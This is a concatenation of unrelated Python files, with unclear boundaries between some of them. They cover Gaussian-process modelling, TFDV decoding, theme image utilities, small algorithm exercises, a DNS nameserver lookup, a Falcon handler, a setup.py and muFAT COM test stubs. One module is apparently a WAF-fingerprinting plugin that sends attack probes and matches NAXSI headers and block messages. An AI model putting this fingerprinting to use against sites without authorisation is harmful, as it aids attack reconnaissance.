               np.array(british_national_grid_coords[0]),
               np.array(british_national_grid_coords[1])]).T

# normalise
# X = (X - np.mean(X, axis=0)) / np.std(X, axis=0)
# Y = (Y - np.nanmean(Y, axis=0)) / np.nanstd(Y, axis=0)

# standardise spatial inputs and outputs; time is rescaled separately below
# X_scaler = StandardScaler().fit(X)
R_scaler = StandardScaler().fit(X[:, 1:])
Y_scaler = StandardScaler().fit(Y)
# X = X_scaler.transform(X)
X[:, 1:] = R_scaler.transform(X[:, 1:])
X[:, 0] = (X[:, 0] - min(X[:, 0])) / (60 * 60)  # convert from seconds to hours
Y = Y_scaler.transform(Y)

grid = True

print(Y.shape)
print("num data points =", Y.shape[0])

# hold out a random 10% of observations as the test set
test_ind = np.random.permutation(X.shape[0])[:X.shape[0]//10]
t_test = X[test_ind, :1]
R_test = X[test_ind, 1:]
Y_test = Y[test_ind, :]

if grid:
    # the gridded approach:
    t, R, Y = bayesnewton.utils.create_spatiotemporal_grid(X, Y)
else:
    # the sequential approach:
    t = X[:, :1]
    R = X[:, 1:]
Nt = t.shape[0]
print("num time steps =", Nt)
# NOTE(review): assumes grid=True (Y is 3-D after create_spatiotemporal_grid)
N = Y.shape[0] * Y.shape[1] * Y.shape[2]
print("num data points =", N)

# ttest = np.unique(X[:, 0])[:, None]
N_test = 20  # 50
# r1 = np.unique(X[:, 1])
# r2 = np.unique(X[:, 2])
# prediction grid: pad the observed spatial extent by 5-10% on each axis
X1range = max(X[:, 1]) - min(X[:, 1])
X2range = max(X[:, 2]) - min(X[:, 2])
r1 = np.linspace(min(X[:, 1]) - 0.1 * X1range, max(X[:, 1]) + 0.1 * X1range, num=N_test)
r2 = np.linspace(min(X[:, 2]) - 0.05 * X2range, max(X[:, 2]) + 0.05 * X2range, num=N_test)
rA, rB = np.meshgrid(r1, r2)
r = np.hstack((rA.reshape(-1, 1), rB.reshape(-1, 1)))  # Flattening grid for use in kernel functions
Rplot = np.tile(r, [t.shape[0], 1, 1])

# initial hyperparameters
var_y = 1.
var_f = 1.
len_time = 5  # step size = 1 (hour)
len_space = 1  # spatial inputs normalised to around [-3, 3]

sparse = True
opt_z = True  # will be set to False if sparse=False
if sparse:
    # inducing inputs on a 7x7 grid over the observed spatial extent
    z1 = np.linspace(np.min(X[:, 1]), np.max(X[:, 1]), num=7)
    z2 = np.linspace(np.min(X[:, 2]), np.max(X[:, 2]), num=7)
    zA, zB = np.meshgrid(z1, z2)  # Adding additional dimension to inducing points grid
    z = np.hstack((zA.reshape(-1, 1), zB.reshape(-1, 1)))  # Flattening grid for use in kernel functions
    del z1, z2, zA, zB
else:
    z = R[0, ...]
# free large intermediates before model construction
del raw_data, X, rA, rB, r, sites_df
# ---- model construction & optimisation --------------------------------
# kern = bayesnewton.kernels.SpatioTemporalMatern52(variance=var_f,
#                                                   lengthscale_time=len_time,
#                                                   lengthscale_space=[len_space, len_space],
#                                                   z=z,
#                                                   sparse=sparse,
#                                                   opt_z=opt_z,
#                                                   conditional='Full')
# separable Matern-3/2 kernel: one temporal factor, two spatial factors
kern_time = bayesnewton.kernels.Matern32(variance=var_f, lengthscale=len_time)
kern_space0 = bayesnewton.kernels.Matern32(variance=var_f, lengthscale=len_space)
kern_space1 = bayesnewton.kernels.Matern32(variance=var_f, lengthscale=len_space)
kern_space = bayesnewton.kernels.Separable([kern_space0, kern_space1])
kern = bayesnewton.kernels.SpatioTemporalKernel(temporal_kernel=kern_time,
                                                spatial_kernel=kern_space,
                                                z=z,
                                                sparse=sparse,
                                                opt_z=opt_z,
                                                conditional='Full')
lik = bayesnewton.likelihoods.Gaussian(variance=var_y)
# model = bayesnewton.models.VariationalGP(kernel=kern, likelihood=lik, X=X, Y=y)
model = bayesnewton.models.MarkovVariationalGP(kernel=kern, likelihood=lik, X=t, R=R, Y=Y)
# model = bayesnewton.models.InfiniteHorizonVariationalGP(kernel=kern, likelihood=lik, X=t, R=R, Y=Y)
# model = bayesnewton.models.MarkovVariationalGPMeanField(kernel=kern, likelihood=lik, X=t, R=R, Y=Y)
# Mt = 700  # num inducing points in time
# batch_size = Nt
# Z = np.linspace(np.min(t), np.max(t), Mt)[:, None]
# model = bayesnewton.models.SparseMarkovVariationalGP(kernel=kern, likelihood=lik, X=t, R=R, Y=Y, Z=Z)

lr_adam = 0.05
lr_newton = 0.5
iters = 20
opt_hypers = objax.optimizer.Adam(model.vars())
energy = objax.GradValues(model.energy, model.vars())


@objax.Function.with_vars(model.vars() + opt_hypers.vars())
def train_op():
    # one variational inference step followed by an Adam hyperparameter step
    model.inference(lr=lr_newton)  # perform inference and update variational params
    dE, E = energy()  # compute energy and its gradients w.r.t. hypers
    opt_hypers(lr_adam, dE)
    return E


train_op = objax.Jit(train_op)

t0 = time.time()
for i in range(1, iters + 1):
    loss = train_op()
    print('iter %2d, energy: %1.4f' % (i, loss[0]))
t1 = time.time()
print('optimisation time: %2.2f secs' % (t1-t0))
# calculate posterior predictive distribution via filtering and smoothing at train & test locations:
print('calculating the posterior predictive distribution ...')
t0 = time.time()
posterior_mean, posterior_var = model.predict(X=t, R=Rplot)
nlpd = model.negative_log_predictive_density(X=t_test, R=R_test, Y=Y_test)
t1 = time.time()
print('prediction time: %2.2f secs' % (t1-t0))
print('nlpd: %2.3f' % nlpd)

z_opt = model.kernel.z.value
mu = bayesnewton.utils.transpose(posterior_mean.reshape(-1, N_test, N_test))
# undo the output standardisation so plots are in the original units
mu = Y_scaler.inverse_transform(mu)
Y = Y_scaler.inverse_transform(Y)

save_result = False
# if save_result:
#     with open("output_mu.txt", "wb") as fp:
#         pickle.dump(mu, fp)

# free the model before the plotting loop to reduce memory pressure
del model, kern, Rplot  # , var

print('plotting ...')
cmap = cm.viridis
# clip the colour scale at the 1st/99th percentiles to suppress outliers
vmin = np.nanpercentile(Y, 1)
vmax = np.nanpercentile(Y, 99)
# one frame per time step: predicted field + observations + time marker
for time_step in range(t.shape[0]):
    print(time_step)
    f, (a0, a1) = plt.subplots(2, 1, gridspec_kw={'height_ratios': [20, 1]})
    f.set_figheight(8)
    # f.set_figwidth(8)
    im = a0.imshow(mu[time_step].T, cmap=cmap, vmin=vmin, vmax=vmax,
                   extent=[r1[0], r1[-1], r2[0], r2[-1]], origin='lower')
    a0.scatter(R[time_step, :, 0], R[time_step, :, 1], cmap=cmap, vmin=vmin, vmax=vmax,
               c=np.squeeze(Y[time_step]), s=50, edgecolors='black')
    plt.colorbar(im, fraction=0.0348, pad=0.03, aspect=30, ax=a0)
    if sparse:
        a0.scatter(z_opt[:, 0], z_opt[:, 1], c='r', s=20, alpha=0.5)  # plot inducing inputs
    a0.set_xlim(r1[0], r1[-1])
    a0.set_ylim(r2[0], r2[-1])
    a0.set_xticks([], [])
    a0.set_yticks([], [])
    a0.set_title(species)
    # a0.set_ylabel('Latitude')
    # a0.set_xlabel('Longitude')
    a0.set_xlabel('Easting')
    a0.set_ylabel('Northing')
    a1.vlines(t[time_step] / 24, -1, 1, 'r')
    a1.set_xlabel('time (days)')
    a1.set_yticks([], [])
    a1.set_xlim(t[0] / 24, t[-1] / 24)
    # a1.set_xticks([0, 7, 14, 21])
    f.savefig('output/output_%04d.png' % time_step)
    plt.close(f)
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Decode TF Examples into in-memory representation for tf data validation."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import apache_beam as beam
from tensorflow_data_validation import types
from tensorflow_data_validation.pywrap import pywrap_tensorflow_data_validation
DecodeExample = pywrap_tensorflow_data_validation.TFDV_DecodeExample # pylint: disable=invalid-name
# TODO(pachristopher): This fast coder can also benefit TFT. Consider moving
# this coder to tf.Beam once it is available.
class TFExampleDecoder(object):
  """A decoder for decoding TF examples into tf data validation datasets.
  """

  def decode(self, serialized_example_proto):
    """Decodes serialized tf.Example to tf data validation input dict."""
    # Delegates to the C++ fast decoder exposed through pywrap.
    return DecodeExample(serialized_example_proto)
@beam.ptransform_fn
@beam.typehints.with_input_types(bytes)
@beam.typehints.with_output_types(types.BeamExample)
def DecodeTFExample(examples
                   ):  # pylint: disable=invalid-name
  """Decodes serialized TF examples into an in-memory dict representation.

  Args:
    examples: A PCollection of strings representing serialized TF examples.

  Returns:
    A PCollection of dicts representing the TF examples.
  """
  # A single decoder instance is shared by the Map fn.
  return examples | 'ParseTFExamples' >> beam.Map(TFExampleDecoder().decode)
|
import os
import subprocess
import tempfile
from base64 import b64encode
from django.conf import settings
from django.utils.encoding import force_text
import six
from PIL import Image
import olympia.core.logger
from olympia.lib.safe_xml import lxml
log = olympia.core.logger.getLogger('z.versions.utils')
def write_svg_to_png(svg_content, out):
    """Render svg_content to a PNG file at `out` via rsvg-convert.

    Returns True on success, False when the output dir can't be created or
    the converter fails. The temporary svg is kept when settings.DEBUG is on
    (i.e. locally) so it can be inspected.
    """
    with tempfile.NamedTemporaryFile(
            dir=settings.TMP_PATH, mode='wb', suffix='.svg',
            delete=not settings.DEBUG) as temporary_svg:
        temporary_svg.write(svg_content)
        temporary_svg.flush()
        out_dir = os.path.dirname(out)
        try:
            if not os.path.exists(out_dir):
                os.makedirs(out_dir)
            subprocess.check_call([
                settings.RSVG_CONVERT_BIN,
                '--output', out,
                temporary_svg.name,
            ])
        except (IOError, subprocess.CalledProcessError) as error:
            # best effort: log and report failure instead of raising
            log.debug(error)
            return False
    return True
def encode_header(header_blob, file_ext):
    """Build a base64 data-uri for a header image blob.

    Returns (src, width, height); on any parse failure returns (None, 0, 0).
    SVG dimensions come from the root element attributes, raster dimensions
    from Pillow.
    """
    try:
        if file_ext == '.svg':
            root = lxml.etree.fromstring(header_blob)
            width = int(root.get('width'))
            height = int(root.get('height'))
            img_format = 'svg+xml'
        else:
            with Image.open(six.BytesIO(header_blob)) as header_image:
                width, height = header_image.size
                img_format = header_image.format.lower()
        encoded = force_text(b64encode(header_blob))
        src = 'data:image/%s;base64,%s' % (img_format, encoded)
    except (IOError, ValueError, TypeError, lxml.etree.XMLSyntaxError) as err:
        log.debug(err)
        return (None, 0, 0)
    return (src, width, height)
class AdditionalBackground(object):
    """An extra theme background image plus its css alignment/tiling."""

    @classmethod
    def split_alignment(cls, alignment):
        """Normalize a css-like alignment string to an (x, y) pair."""
        parts = alignment.split()
        if not parts:
            return ('', '')
        if len(parts) == 1:
            only = parts[0]
            # e.g. "left" means 'left center'; "top" means 'center top'
            if only in ('left', 'right'):
                return (only, 'center')
            return ('center', only)
        # e.g. "center top"
        return (parts[0], parts[1])

    def __init__(self, path, alignment, tiling, background):
        # If there an unequal number of alignments or tiling to srcs the
        # value will be None so use defaults.
        self.alignment = (alignment or 'right top').lower()
        self.tiling = (tiling or 'no-repeat').lower()
        self.src, self.width, self.height = encode_header(
            background, os.path.splitext(path)[1])

    def calculate_pattern_offsets(self, svg_width, svg_height):
        """Derive svg pattern x/y/width/height from alignment and tiling."""
        align_x, align_y = self.split_alignment(self.alignment)

        if align_x == 'right':
            self.pattern_x = svg_width - self.width
        elif align_x == 'center':
            self.pattern_x = (svg_width - self.width) // 2
        else:
            self.pattern_x = 0

        if align_y == 'bottom':
            self.pattern_y = svg_height - self.height
        elif align_y == 'center':
            self.pattern_y = (svg_height - self.height) // 2
        else:
            self.pattern_y = 0

        # a repeating (or oversized) image keeps its own size; otherwise the
        # pattern stretches to cover the whole svg
        repeats_x = self.tiling in ('repeat', 'repeat-x')
        self.pattern_width = (
            self.width if repeats_x or self.width > svg_width else svg_width)
        repeats_y = self.tiling in ('repeat', 'repeat-y')
        self.pattern_height = (
            self.height if repeats_y or self.height > svg_height
            else svg_height)
# Chrome manifest color property names mapped to their css equivalents;
# anything not listed passes through unchanged.
CHROME_COLOR_TO_CSS = {
    'bookmark_text': 'toolbar_text',
    'frame': 'accentcolor',
    'frame_inactive': 'accentcolor',
    'tab_background_text': 'textcolor',
}


def process_color_value(prop, value):
    """Normalize one (property, value) color pair to css form."""
    prop = CHROME_COLOR_TO_CSS.get(prop, prop)
    if isinstance(value, list) and len(value) == 3:
        # an [r, g, b] triple becomes an rgb() expression
        return prop, u'rgb(%s,%s,%s)' % tuple(value)
    # strip out spaces because jquery.minicolors chokes on them
    stripped = six.text_type(value).replace(' ', '')
    return prop, stripped
|
# Greedily express n as a sum of powers of x, repeatedly subtracting the
# largest power x**z <= n and prepending "+x^z" to the output string.
n = int(input("Enter n: "))
x = int(input("Enter x: "))
power = 0
z = 0
st = ""
while n >= 1:
    if x == 1:
        # Fix: with x == 1, x**power <= n never becomes false, so the
        # search loop below would spin forever; 1**0 is the only power.
        z = 0
    else:
        # find the largest exponent z with x**z <= n
        while x**power <= n:
            power += 1
        z = power - 1
    n = n - x**z
    st = "+" + str(x) + "^" + str(z) + st
    power = 0
print(st)
|
# Binary Tree Level Order Traversal - Breadth First Search 1
# Given the root of a binary tree, return the level order traversal of its nodes' values. (i.e., from left to right, level by level).
class TreeNode:
    # Minimal binary-tree node: a value plus optional left/right children.
    def __init__(self, val=0, left=None, right=None):
        self.val = val
        self.left = left
        self.right = right
class Solution:
    def levelOrder(self, root):
        """Return node values level by level, left to right (BFS)."""
        if not root:
            return []
        levels = []
        frontier = [root]  # all nodes of the level currently being visited
        while frontier:
            levels.append([node.val for node in frontier])
            # children of the current level, preserving left-to-right order
            frontier = [child
                        for node in frontier
                        for child in (node.left, node.right)
                        if child]
        return levels

# Time Complexity: O(N)
# Space Complexity: O(N)
|
from dns.resolver import Resolver, query, NXDOMAIN
import dns.query
from dns.exception import Timeout
from dns.message import make_query
from dns.rdatatype import NS
import socket
from random import choice
def get_zone_nameservers(zone):
    """Resolve the NS records of *zone* and return their IPv4 addresses."""
    return [socket.gethostbyname(answer.to_text())
            for answer in query(zone, 'NS')]
def names_to_nameservers(names):
    """Yield (name, tuple of delegation NS targets) for each hostname,
    asking a randomly chosen nameserver of the parent zone directly."""
    zone_nss = {}  # cache: parent zone -> list of its nameserver IPs
    for name in names:
        domain, zone = name.split('.', 1)  # NOTE(review): `domain` is unused
        if zone not in zone_nss:
            zone_nss[zone] = get_zone_nameservers(zone + '.')
        msg = make_query(name + '.', NS)
        ns = choice(zone_nss[zone])
        response = dns.query.udp(msg, ns)
        # the authority section of the referral carries the NS delegation
        yield (name, tuple(sorted(rr.target.to_text() for rr in response.authority[0] if rr.rdtype == NS)))
# NOTE: Python 2 syntax (print statement below).
# Report the delegation nameservers for every domain listed in domains.txt.
with open('domains.txt', 'r') as fh:
    for host, nss in names_to_nameservers(line.rstrip() for line in fh):
        if nss == ():
            # empty authority section: no delegation found
            ns = "NONE"
        else:
            ns = "\n\t".join(nss)
        print host + "\n\t" + ns + "\n"
# -*- coding: utf-8 -*-
import uuid
URL_TEMPLATE = "{scheme}://{domain}/{path}"
def get_uuid_from_query_params(request, param):
    """
    Return the query parameter *param* parsed as a UUID, or None when the
    parameter is missing, empty, or not a valid UUID string.
    """
    raw_value = request.query_params.get(param)
    if not raw_value:
        return None
    try:
        return uuid.UUID(raw_value)
    except ValueError:
        # malformed UUID text is treated the same as an absent parameter
        return None
|
#!/usr/bin/env python
NAME = 'NAXSI (NBS Systems)'


def is_waf(self):
    """Fingerprint the NAXSI WAF via response headers, then attack probes."""
    # Sometimes naxsi waf returns 'x-data-origin: naxsi/waf';
    # found samples returning 'server: naxsi/2.0'.
    header_probes = (
        ('X-Data-Origin', r'^naxsi(.*)?'),
        ('server', r'naxsi(.*)?'),
    )
    for probe in header_probes:
        if self.matchheader(probe):
            return True
    block_signatures = (b'Blocked By NAXSI', b'Naxsi Blocked Information')
    for attack in self.attacks:
        result = attack(self)
        if result is None:
            # attack yielded no response: bail out (implicit None, as before)
            return
        _, responsebody = result
        if any(sig in responsebody for sig in block_signatures):
            return True
    return False
from justgood import imjustgood
# Example: fetch youtube video metadata/download links via the imjustgood API.
api = imjustgood("YOUR_APIKEY_HERE")  # substitute a real API key before running
data = api.youtubedl("https://youtu.be/kJQP7kiw5Fk")
print(data)

# EXAMPLE GET CERTAIN ATTRIBUTES
result = "Title : {}".format(data["result"]["title"])
result += "\nAuthor : {}".format(data["result"]["author"])
result += "\nDuration : {}".format(data["result"]["duration"])
result += "\nWatched : {}".format(data["result"]["watched"])
result += "\n\nThumbnail :\n{}".format(data["result"]["thumbnail"])
result += "\n\nAudio :\n{}".format(data["result"]["audioUrl"])
result += "\n\nVideo :\n{}".format(data["result"]["videoUrl"])
result += "\n\nPage : {}".format(data["result"]["pageUrl"])
print(result)
|
from datadog_custom_logger.handler import DatadogCustomLogHandler
import logging |
import falcon
import json
class Home:
    """Root resource serving a static hello-world JSON payload."""

    def on_get(self, req, res):
        payload = {'hello': 'world'}
        res.data = json.dumps(payload).encode('utf-8')
        res.status = falcon.HTTP_200
|
import codecs
import re
import os
import sys
# Fail with a helpful message when setuptools is unavailable.
# Fix: catch ImportError specifically -- the old bare `except:` would also
# swallow KeyboardInterrupt/SystemExit and unrelated errors.
try:
    from setuptools import setup
except ImportError:
    print('please install setuptools via pip:')
    print('  <pip_exe> install setuptools')
    sys.exit(-1)
def find_version(*file_paths):
    """Extract the `__version__ = '...'` string from the file at *file_paths*
    (joined relative to this setup script's directory).

    Raises RuntimeError when no version assignment is found.
    Fix: the file handle was previously never closed; use a `with` block.
    """
    path = os.path.join(
        os.path.abspath(os.path.dirname(__file__)), *file_paths)
    with codecs.open(path, 'r') as version_fh:
        version_file = version_fh.read()
    version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]",
                              version_file, re.M)
    if version_match:
        return version_match.group(1)
    raise RuntimeError("Unable to find version string.")
# Package metadata; the version is read from paramgmt/__init__.py so it is
# declared in exactly one place.
setup(
    name='paramgmt',
    version=find_version('paramgmt', '__init__.py'),
    description='Parallel SSH machine management',
    author='Nic McDonald',
    author_email='nicci02@hotmail.com',
    license='Apache License Version 2.0',
    url='http://github.com/google/paramgmt',
    packages=['paramgmt'],
    scripts=['bin/rhosts', 'bin/lcmd', 'bin/rcmd',
             'bin/rpull', 'bin/rpush', 'bin/rscript'],
    install_requires=['termcolor >= 1.1.0'],
)
|
"""
All function stubs that make up a muFAT run are implemented here. Essentially,
a 'stub' is any function that when called once inside a run performs any number
of tasks, while hiding the underlying nitty gritty details of mucking about with
muvee's COM interfaces.
All of these function stubs will be imported into the 'muvee.*' module namespace.
Example stubs:
- muvee.Init
- muvee.Release
- muvee.AddSourceImage
"""
import inspect, os, re, sys, threading, time
from functools import wraps
from xml.etree import ElementTree as etree
from . import gen_stub, ArType, InitFlags, LoadFlags, MakeFlags, SourceType, \
TimelineType, IMVExclude, IMVHighlight, IMVImageInfo, IMVOperatorInfo, \
IMVPrimaryCaption, IMVSource, IMVSource2, IMVStyleCollection, IMVStyleEx, \
IMVSupportMultiCaptions, IMVTargetRect, IMVTitleCredits
from .testing import detect_media, generate_test, normalize
from .window import Window
def is_a_stub(f):
    """
    Marks the function as a test stub, so that `muvee.testing.MufatTestRunner`
    can discover and wrap the function as a `unittest.FunctionTestCase`.

    Alternatively, when a testcase is run by `muvee.testing.run`, any functions
    decorated by '@is_a_stub' will be dynamically wrapped as a
    `unittest.FunctionTestCase` before being executed as part of an ongoing
    test suite.
    """
    @wraps(f)
    def runner(*args, **kwargs):
        # defer to the test harness, which wraps f as a test case
        return generate_test(f, *args, **kwargs)
    runner.is_a_stub = True  # discovery marker checked by the runner
    return runner
def is_true_or_non_zero(ret):
    """Return True when a stub's return value signals success: None, True,
    or a non-negative int/float.

    Note: False is deliberately NOT success, matching the original
    `type(ret) in [int, float]` check which excluded bool. Fixes the
    `== None` / `== True` comparisons (use identity) and the type() check
    (use isinstance, explicitly excluding bool since bool subclasses int).
    """
    if ret is None or ret is True:
        return True
    return (isinstance(ret, (int, float))
            and not isinstance(ret, bool)
            and ret >= 0)
@is_a_stub
def Init(flags=InitFlags.DEFAULT):
    """Initializes MVRuntime.MVCore

    :param flags: `muvee.InitFlags` bitmask passed straight to Core.Init
    """
    # imported inside the stub so the COM runtime loads only when needed
    from .mvrt import Core
    Core.Init(flags)
@is_a_stub
def Release():
    """Releases the COM reference to MVRuntime"""
    from . import mvrt
    mvrt.Release()
def AddSource(src, srctype=SourceType.UNKNOWN, loadtype=LoadFlags.VERIFYSUPPORT):
    """Register an already-created IMVSource with the global Core.

    :param src: IMVSource object (see `CreateSource`)
    :param srctype: `muvee.SourceType`; UNKNOWN means derive it from src.Type
    :param loadtype: `muvee.LoadFlags` passed through to Core.AddSource
    """
    from .mvrt import Core
    # guess type from source object
    if srctype == SourceType.UNKNOWN:
        srctype = int(src.Type)
    # NOTE(review): GetLastErrorDescription is presumably defined elsewhere
    # in this module (not visible in this chunk)
    assert Core.AddSource(srctype, src, loadtype), \
        'AddSource failed: ' + GetLastErrorDescription()
def CreateSource(path, srctype):
    """
    Creates and returns an IMVSource object for the given file and source type.

    :param path: Path to the source file (or a context string for
        non-file source types)
    :param srctype: `muvee.SourceType` enumeration
    """
    from .mvrt import Core
    src = Core.CreateMVSource(srctype)
    if srctype in [ SourceType.IMAGE, SourceType.MUSIC, SourceType.VIDEO ]:
        # media files are verified for format support while loading
        path = normalize(path)
        assert os.path.exists(path), "File %s does not exist" % path
        assert src.LoadFile(path, LoadFlags.VERIFYSUPPORT), \
            'LoadFile failed: ' + GetLastErrorDescription()
    elif srctype == SourceType.OPERATOR:
        assert os.path.exists(path), "File %s does not exist" % path
        assert src.LoadFile(path, LoadFlags.NULL), \
            'LoadFile failed: ' + GetLastErrorDescription()
    else:
        # not a file source type
        src2 = gen_stub(IMVSource2)(src)
        src2.Load(path, int(LoadFlags.CONTEXT))
    return src
@is_a_stub
def EnumAndSetMVStyle(sty):
    """Resolve a style via the style collection and make it active."""
    from .mvrt import Core
    styname = Core.Styles.EnumMVStyleByMod(sty)
    Core.SetActiveMVStyle(styname)
@is_a_stub
def AddSourceImage(path):
    """Create an image source from `path` and add it to the Core."""
    src = CreateSource(path, SourceType.IMAGE)
    AddSource(src, SourceType.IMAGE, LoadFlags.VERIFYSUPPORT)
@is_a_stub
def AddSourceImageWithCaption(path, caption):
    """Add an image source with a single caption attached and verified."""
    from . import IMVCaptionCollection
    src = CreateSource(path, SourceType.IMAGE)
    if hasattr(src, 'Captions'):
        supports = src.Captions
    else:
        # source doesn't expose Captions directly: cast to the
        # multi-caption support interface first
        supports = gen_stub(IMVSupportMultiCaptions)(src).Captions
    captions = IMVCaptionCollection(supports)
    assert captions.AddCaption(caption) is not None, \
        'AddCaption failed: ' + GetLastErrorDescription()
    assert len(captions) > 0
    assert captions.VerifyUserDscrp(), \
        'VerifyUserDscrp failed: ' + GetLastErrorDescription()
    AddSource(src, SourceType.IMAGE, LoadFlags.VERIFYSUPPORT)
@is_a_stub
def AddSourceImageWithMagicSpot(path, *args):
    """Add an image source with magic-spot target rectangles.

    :param path: image file path
    :param args: flat coordinate list, consumed in groups of 4 per rect
    """
    src = CreateSource(path, SourceType.IMAGE)
    # cast IMVSource to IMVTargetRect
    rect = gen_stub(IMVTargetRect)(src)
    # add magic spots from variable arguments in 4-pairs
    # fix: use range, not Python-2-only xrange (NameError on Python 3;
    # identical iteration on Python 2)
    for i in range(0, len(args), 4):
        coords = args[i:i + 4]
        assert len(coords) == 4
        rect.AddTargetRect(*coords)
    AddSource(src, SourceType.IMAGE, LoadFlags.VERIFYSUPPORT)
@is_a_stub
def AddSourceMusic(path):
    """Create a music source from `path` and add it to the Core."""
    src = CreateSource(path, SourceType.MUSIC)
    AddSource(src, SourceType.MUSIC, LoadFlags.VERIFYSUPPORT)
@is_a_stub
def AddSourceMusicClip(path, start, stop):
    """Add a music source trimmed to the [start, stop] clip range."""
    src = CreateSource(path, SourceType.MUSIC)
    src.Start = start
    src.Stop = stop
    AddSource(src, SourceType.MUSIC, LoadFlags.VERIFYSUPPORT)
@is_a_stub
def AddSourceTextWithMinDuration(text, duration):
    """Add a text source with a minimum on-screen segment duration."""
    src = CreateSource(text, SourceType.TEXT)
    src.MinImgSegDuration = duration
    AddSource(src, SourceType.TEXT, LoadFlags.CONTEXT)
@is_a_stub
def AddSourceVideo(path):
    """Create a video source from `path` and add it to the Core."""
    src = CreateSource(path, SourceType.VIDEO)
    AddSource(src, SourceType.VIDEO, LoadFlags.VERIFYSUPPORT)
@is_a_stub
def AddSourceVideoNoProxy(path):
    """Add a video source with the low-res proxy generation disabled."""
    from .mvrt import Core
    src = Core.CreateMVSource(SourceType.VIDEO)
    path = normalize(path)
    assert os.path.exists(path), "File %s does not exist" % path
    # combine flags explicitly since DISABLE_LOREZPROXY must be OR-ed in
    assert src.LoadFile(path, int(LoadFlags.VERIFYSUPPORT)|int(LoadFlags.DISABLE_LOREZPROXY)), \
        'LoadFile failed: ' + GetLastErrorDescription()
    AddSource(src, SourceType.VIDEO, int(LoadFlags.VERIFYSUPPORT)|int(LoadFlags.DISABLE_LOREZPROXY))
@is_a_stub
def AddSourceVideoWithCapHL(path, caption, start, end):
    """Add a video source with a caption highlighted over [start, end]."""
    src = CreateSource(path, SourceType.VIDEO)
    # cast IMVSource to IMVCaptionHighlight
    from . import IMVCaptionHighlight
    hilite = gen_stub(IMVCaptionHighlight)(src)
    hilite.SetCaptionHighlight(caption, start, end, None)
    hilite.VerifyUserDescriptors()
    AddSource(src, SourceType.VIDEO, LoadFlags.VERIFYSUPPORT)
@is_a_stub
def AddSourceVideoWithMagicMoments(path, *args):
    """Add a video source with highlight ("magic moment") ranges.

    ``args`` is consumed two values at a time as (start, stop) pairs.
    """
    src = CreateSource(path, SourceType.VIDEO)
    # cast IMVSource to IMVHighlight
    hilite = gen_stub(IMVHighlight)(src)
    # add highlights from variable arguments in tuple pairs
    for i in xrange(0, len(args), 2):
        pair = args[i:i+2]
        assert len(pair) == 2
        hilite.SetHighlight(*pair)
    # test if highlights were set correctly
    hilite.VerifyUserDescriptors()
    AddSource(src, SourceType.VIDEO, LoadFlags.VERIFYSUPPORT)
@is_a_stub
def AddSourceVideoWithExclusion(path, *args):
    """Add a video source with excluded ranges.

    ``args`` is consumed two values at a time as (start, stop) pairs.
    """
    src = CreateSource(path, SourceType.VIDEO)
    # cast IMVSource to IMVExclude
    exclude = gen_stub(IMVExclude)(src)
    # add exclusions from variable arguments in tuple pairs
    for i in xrange(0, len(args), 2):
        pair = args[i:i+2]
        assert len(pair) == 2
        exclude.SetExclusion(*pair)
    # test if exclusions were set correctly
    exclude.VerifyUserDescriptors()
    AddSource(src, SourceType.VIDEO, LoadFlags.VERIFYSUPPORT)
@is_a_stub
def AddSourceAnchorOperator(scmfile, music_idx, anchor_value):
    """Add an operator source anchored to an existing music source.

    :param scmfile: Path of the operator (.scm) file.
    :param music_idx: Index into Core.MusicSources; must be in range.
    :param anchor_value: Value stored as the ANCHOR_TIME parameter.
    """
    from .mvrt import Core
    assert Core.MusicSources.Count > music_idx, "Music index out-of-range!"
    music = Core.MusicSources[music_idx]
    src = CreateSource(scmfile, SourceType.OPERATOR)
    # setup anchor parameters
    op = gen_stub(IMVOperatorInfo)(src)
    op.SetParam("ANCHOR_MEDIA", music.UniqueID)
    op.SetParam("ANCHOR_TIME", anchor_value)
    AddSource(src, SourceType.OPERATOR, LoadFlags.NULL)
@is_a_stub
def AddCopyright(message, color=None, x=None, y=None, width=None, height=None):
    """Set the production's primary (copyright) caption and its format.

    Only the formatting fields passed as non-None are modified.
    """
    from .mvrt import Core
    # set copyright message
    primary = gen_stub(IMVPrimaryCaption)(Core)
    primary.PrimaryCaption.Text = message
    fmt = primary.PrimaryCaption.TextDisplayFormat
    # set formatting
    if color is not None:
        fmt.BackgroundColor = color
    if x is not None:
        fmt.TextRectXCoord = x
    if y is not None:
        fmt.TextRectYCoord = y
    if width is not None:
        fmt.TextRectWidth = width
    if height is not None:
        fmt.TextRectHeight = height
    # write the modified format object back to the caption
    primary.PrimaryCaption.TextDisplayFormat = fmt
@is_a_stub
def AddLogo(path, placement=None, opacity=None, crop=None):
    """Overlay a logo image on the production.

    :param placement: Optional 4-sequence of numbers for SetOverlayPlacement.
    :param opacity: Optional numeric opacity.
    :param crop: Optional sequence of numbers for SetOverlayCropRect.
    """
    from . import IMVProductionOverlay
    from .mvrt import Core
    # set logo
    overlay = gen_stub(IMVProductionOverlay)(Core)
    path = normalize(path)
    assert os.path.isfile(path)
    overlay.OverlaySourceFile = path
    if placement is not None and len(placement) == 4:
        assert all(type(arg) in [float, int] for arg in placement), "Arguments must be floats"
        overlay.SetOverlayPlacement(*placement)
    if opacity is not None:
        assert type(opacity) in [float, int]
        overlay.OverlayOpacity = opacity
    if crop is not None:
        assert all(type(arg) in [float, int] for arg in crop), "Arguments must be floats"
        overlay.SetOverlayCropRect(*crop)
@is_a_stub
def ConfigRenderTL2File(path):
    """Configure file rendering from an existing .bin configuration file."""
    from .mvrt import Core
    # check if file exists
    path = normalize(path)
    assert os.path.isfile(path) and os.path.splitext(path)[1] == '.bin'
    Core.ConfigRenderTL2File(path)
def GetLastErrorDescription():
    """Return the runtime core's description of the last error."""
    from .mvrt import Core
    return Core.GetLastErrorDescription()
@is_a_stub
def SetActiveMVStyle(style, check=False):
    """
    Sets the current Muvee Style to `style`
    :param style: A string containing the name of the style, or a number representing
    the n-th index in the styles list
    :param check: Whether to validate if the given parameter is in the list of
    available styles first.
    """
    from .mvrt import Core
    if check:
        assert Core.Styles.Count > 0, "No styles found!"
        # check if style name is valid
